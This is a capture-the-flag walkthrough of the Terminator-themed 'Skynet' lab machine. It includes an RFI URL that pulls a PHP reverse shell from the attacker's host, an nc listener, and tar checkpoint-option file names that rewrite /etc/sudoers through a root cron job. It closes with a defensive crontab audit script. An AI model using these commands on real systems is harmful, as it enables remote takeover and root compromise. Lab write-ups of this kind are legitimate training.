
Skynet

A vulnerable Terminator themed Linux machine.

Link to the machine

Answer 1

My target IP: 10.10.84.89

We start by simply launching an nmap scan.

 nmap -sC -sV -oN nmap -O -T4 [@Target_IP]

Image 1

We can see that 6 services are open, including port 80. We open it in a web browser to see what is served.

Image 2

We launch gobuster to discover hidden files or directories.

Image 3

The “admin” directory is forbidden, so we focus on the “squirrelmail” directory.

Image 4

We could attempt a brute force attack, but for now, I prefer to revisit the information provided by nmap, which indicates the presence of a Samba share. To enumerate it, we can use the tool “enum4linux.”

 enum4linux 10.10.84.89

Image 5

Bingo! We learn two things: anonymous account usage is allowed, and there is also a share named “milesdyson.”

Let’s connect anonymously and download the content of the “milesdyson” share.

Image 6

Image 7

We find that “log1.txt” is a password list.

At this stage, we have a list of passwords and a possible username: milesdyson. We try to connect to the mail server using the passwords from this list and the username milesdyson. Success! It was quite fast.

Answer 2

Image 8

In one of the emails, we find the new password for this user, allowing us to connect to their share.

Image 9

In the “notes” directory, we find the file “important.txt.”

Image 10

The document mentions a CMS. Let’s see how it looks in the browser.

Image 11

Here is our hidden directory.

Answer 3

Not knowing what to do at this stage, I relaunch gobuster on this new address.

Image 12

Image 13

We get something called Cuppa CMS. Let’s search for a known vulnerability.

Image 14

Image 15

Remote File Inclusion, so let’s try to inject a reverse shell.

Answer 4

I’ll use the one from pentestmonkey.

My attacking machine’s IP: 10.10.220.244

Remember to change the address in the script to your own machine’s:

Image 16

In one terminal, we start a Python HTTP server in the directory where our script is located.

In another terminal, we listen on port 1234 (if you haven’t changed it):

 nc -lvnp 1234

So in one shell:

Image 17

And in another:

Image 18

Then, in the web browser:

 http://10.10.84.89/[NAME OF HIDDEN DIRECTORY]/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.220.244:8000/php-reverse-shell.php

Image 19

The reverse shell is in place!

Image 20

Image 21

Answer 5

Now it’s time to escalate privileges.

Image 22

I can’t use the “sudo -l” command, so I decide to take a look at the crontab, and there we find an interesting entry.

Image 23

I’ll check GTFOBins to see if we can do something with that “tar” command executed as root.

Image 24

echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html"  > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html"  > --checkpoint=1

Image 25

After 1 minute:

Image 26

Image 27
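To look at this last step from the defender’s side, here is an added example of my own (not code from the room or from the author): a small audit that reads a system crontab, flags tar jobs whose file list comes from a shell wildcard, and lists any names in the archived directory that tar would parse as options instead of paths. The crontab text is constructed to resemble the job in the screenshot (a root tar backup of /var/www/html); the exact command on the machine is not on this page.

```python
import os
import re
from typing import Dict, List

# Constructed sample of a system crontab (m h dom mon dow user command).
# The tar line is modelled on the root backup job this room relies on;
# it is an assumption, not the machine's real crontab.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
17 * * * * root    cd / && run-parts --report /etc/cron.hourly
*/1 * * * * root   /bin/tar -zcf /var/backups/backup.tgz /var/www/html/*
0 3 * * * root     /usr/bin/rsync -a /srv/ /mnt/backup/
"""

# A tar invocation followed (lazily) by the first argument containing '*'.
TAR_WILDCARD = re.compile(r"\btar\b.*?(?P<glob>\S*\*\S*)")


def find_wildcard_tar_jobs(crontab_text: str) -> List[Dict[str, str]]:
    """Return cron entries that run tar with a shell wildcard in its arguments."""
    findings = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)  # five time fields, user, command
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        match = TAR_WILDCARD.search(command)
        if match:
            findings.append({"user": user, "command": command,
                             "glob": match.group("glob")})
    return findings


def suspicious_names(entries: List[str]) -> List[str]:
    """Names that the shell would expand into arguments tar reads as options."""
    return sorted(name for name in entries if name.startswith("-"))


def audit_directory(path: str) -> List[str]:
    """Apply suspicious_names to a real directory; empty if it does not exist."""
    try:
        return suspicious_names(os.listdir(path))
    except FileNotFoundError:
        return []
```

A job that archives the directory itself (`/var/www/html`) instead of a glob never passes attacker-controlled file names as arguments, which is the fix this check points at.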
